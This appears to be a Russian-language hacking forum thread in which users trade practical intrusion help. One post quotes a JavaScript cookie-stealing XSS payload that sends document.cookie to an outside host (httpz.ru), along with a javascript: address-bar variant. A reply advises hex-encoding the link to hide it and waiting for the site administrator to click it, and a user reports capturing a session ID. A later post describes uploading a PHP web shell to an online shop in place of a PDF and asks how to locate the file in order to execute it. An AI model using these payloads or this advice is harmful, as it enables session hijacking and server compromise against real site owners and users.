winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')
куда и как подставлять? куки должны сразу прейти или надо ждать?
в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...
P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:
winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
Куки это. Обратись к стандартному мануалу по использованию XSS:
Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?